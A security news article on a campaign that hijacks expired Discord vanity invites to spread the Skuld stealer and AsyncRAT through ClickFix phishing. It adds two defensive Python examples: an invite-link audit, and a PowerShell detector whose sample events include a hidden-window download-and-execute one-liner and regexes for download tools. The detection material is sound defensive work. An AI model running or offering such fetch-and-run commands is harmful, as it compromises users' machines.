A new malware campaign is taking advantage of a flaw in Discord’s invitation system to deliver two payloads: Skuld, an information stealer, and AsyncRAT, a remote access trojan. Attackers hijack invitation links by registering vanity links, which lets them silently redirect users from legitimate sources to harmful servers.
According to security researchers from Check Point, this method combines techniques such as ClickFix phishing, multi-stage loading, and time-based evasions. The vulnerability in Discord’s invite mechanism lets cybercriminals take control of expired or deleted invite links, turning previously trusted links into channels for malware delivery. Users who follow these links can easily be led to malicious sites.
Just a month earlier, Check Point identified another phishing scheme that exploited expired vanity invite links, enticing users to join a server while steering them to a phishing site that drained their digital assets once their wallets were connected.
Discord lets users create temporary, permanent, or custom (vanity) invite links, but it prevents legitimate servers from reclaiming a code once it has expired or been deleted. The security research revealed, however, that the custom invite feature allows those old codes to be re-registered, creating a new class of abuse.
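The practical consequence for a community is that an invite link it published long ago may now point somewhere else. The following added example (not code from the Check Point report or from Discord) shows a small audit routine a server admin could run over their published links: it extracts the invite code from the common link formats and compares the guild the code resolves to against the guild IDs the community actually owns. The resolved data is assumed to be in the shape of Discord's public `GET /invites/{code}` response (with `with_expiration=true`), supplied here as constructed sample dictionaries rather than fetched live; the guild IDs and codes are placeholders.

```python
import re

# Constructed placeholder: the guild IDs this community actually owns.
OWNED_GUILD_IDS = {"111111111111111111"}

# Accepts discord.gg/<code>, discord.com/invite/<code>, discordapp.com/invite/<code>,
# with or without scheme and trailing slash.
INVITE_RE = re.compile(
    r"^(?:https?://)?(?:www\.)?(?:discord\.gg|discord(?:app)?\.com/invite)/([A-Za-z0-9-]+)/?$"
)


def invite_code(url):
    """Return the invite code embedded in a Discord invite link."""
    m = INVITE_RE.match(url.strip())
    if not m:
        raise ValueError(f"not a Discord invite link: {url!r}")
    return m.group(1)


def audit_invite(url, resolved):
    """Classify a published invite link.

    resolved: a dict shaped like the GET /invites/{code} response (assumed
    shape, constructed here), or None if the code no longer resolves.
    Returns (code, status, detail).
    """
    code = invite_code(url)
    if resolved is None:
        # A dead code is exactly what a vanity-URL re-registration would reclaim.
        return code, "dead", "code no longer resolves; remove it from every place it was published"
    guild = resolved.get("guild", {})
    if guild.get("id") not in OWNED_GUILD_IDS:
        return code, "hijacked", f"resolves to foreign guild {guild.get('id')} ({guild.get('name')})"
    if resolved.get("expires_at"):
        # Still ours today, but a temporary code becomes reclaimable once it lapses.
        return code, "temporary", f"expires at {resolved['expires_at']}; replace with a permanent link"
    return code, "ok", f"resolves to owned guild {guild.get('id')}"


# Constructed sample inputs: each pair is (published link, resolved invite object or None).
SAMPLES = [
    ("https://discord.gg/abc123",
     {"code": "abc123", "guild": {"id": "111111111111111111", "name": "Our Community"},
      "expires_at": None}),
    ("https://discord.com/invite/xyz789",
     {"code": "xyz789", "guild": {"id": "999999999999999999", "name": "Verify Here"},
      "expires_at": None}),
    ("discord.gg/oldcode", None),
    ("https://discord.gg/temp42",
     {"code": "temp42", "guild": {"id": "111111111111111111", "name": "Our Community"},
      "expires_at": "2099-01-01T00:00:00+00:00"}),
]


def run_audit(samples):
    """Audit every (link, resolved) pair and return the list of results."""
    return [audit_invite(url, resolved) for url, resolved in samples]


if __name__ == "__main__":
    for code, status, detail in run_audit(SAMPLES):
        print(f"{code:10} {status:10} {detail}")
```

Anything reported as "dead" or "temporary" is the case the article describes: a code that is, or will become, available for someone else to register. Treating those the same way as "hijacked" (pull the link from wikis, pinned posts and social profiles) removes the window the attackers rely on.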
The attack outline indicates that cybercriminals are seizing invite links initially shared by regular communities to channel users into their malicious servers. Once individuals join, they’re prompted to verify their accounts, leading them to a counterfeit site with a "Verify" button. This button activates JavaScript that copies a PowerShell command to the victim’s clipboard, where they’re then guided to execute it, inadvertently downloading malware.
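The "copy a command to the clipboard, then talk the user into running it" step leaves a recognizable trace on the endpoint: a PowerShell process started from the user's shell (explorer.exe, which also backs the Run dialog) with a command line that hides its window, skips the profile, or pulls code over the network and executes it in memory. The following added example (not code from Check Point or from the campaign) scores constructed process-creation events, shaped like Sysmon Event ID 1 fields, against those indicators so a defender can see which events would be flagged and why. The sample events, paths and URLs are all constructed; the weights and threshold are assumptions to tune against real telemetry.

```python
import ntpath
import re

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation)
# fields. None of these are captures from the campaign.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iwr https://example.invalid/x | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell"},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     # Constructed placeholder blob, not a real encoded payload.
     "CommandLine": "pwsh -EncodedCommand UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA="},
]

PS_IMAGES = {"powershell.exe", "pwsh.exe"}
# Parents that mean "a human launched this interactively" (Run dialog, desktop).
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line indicators commonly seen in pasted loader one-liners.
INDICATORS = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("profile bypass", re.compile(r"-no?p(?:rofile)?\b", re.I)),
    ("encoded command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{8,}", re.I)),
    ("download cradle", re.compile(r"(?:iwr|invoke-webrequest|downloadstring|curl|wget|net\.webclient)", re.I)),
    ("in-memory execution", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
]


def score_event(ev):
    """Return (score, reasons) for one process-creation event; 0 for non-PowerShell images."""
    if ntpath.basename(ev["Image"]).lower() not in PS_IMAGES:
        return 0, []
    score, reasons = 0, []
    if ntpath.basename(ev["ParentImage"]).lower() in INTERACTIVE_PARENTS:
        score += 2  # assumed weight: user-launched PowerShell is the ClickFix entry point
        reasons.append("launched from explorer.exe (Run dialog / pasted command)")
    for label, pattern in INDICATORS:
        if pattern.search(ev["CommandLine"]):
            score += 1
            reasons.append(label)
    return score, reasons


def detect(events, threshold=3):
    """Return the events whose score reaches the (assumed) alerting threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"index": i, "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(f"event {hit['index']}: score {hit['score']}: {', '.join(hit['reasons'])}")
```

The interactive-parent weight is what separates this from a generic "suspicious PowerShell" rule: an administrator's scheduled script launched from cmd.exe scores nothing here, while a bare interactive PowerShell from the desktop stays below the threshold until it also carries hidden-window, encoded or download-and-execute arguments.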
AsyncRAT provides comprehensive remote control of infected machines, utilizing a dead drop resolver to connect to command-and-control servers through Pastebin. Meanwhile, the Skuld information stealer, written in Golang, is designed to extract sensitive information from Discord, various web browsers, crypto wallets, and gaming platforms.
Skuld also targets crypto wallet seed phrases and passwords from popular wallets by replacing legitimate application files with compromised versions. The attack’s meticulous design includes techniques to bypass browser security measures, allowing the attackers to blend their traffic with legitimate services, thus not raising any red flags.
Check Point reported that the same threat actor is also distributing malware disguised as a hacktool for unlocking pirated games, which has already seen significant downloads. The victims of these attacks appear to be residing primarily in countries such as the United States, Germany, Vietnam, and the United Kingdom.
This campaign underscores the risks related to Discord’s invite system, emphasizing how seemingly minor features can serve as potent attack vectors, especially for cybercriminals focused on stealing cryptocurrency.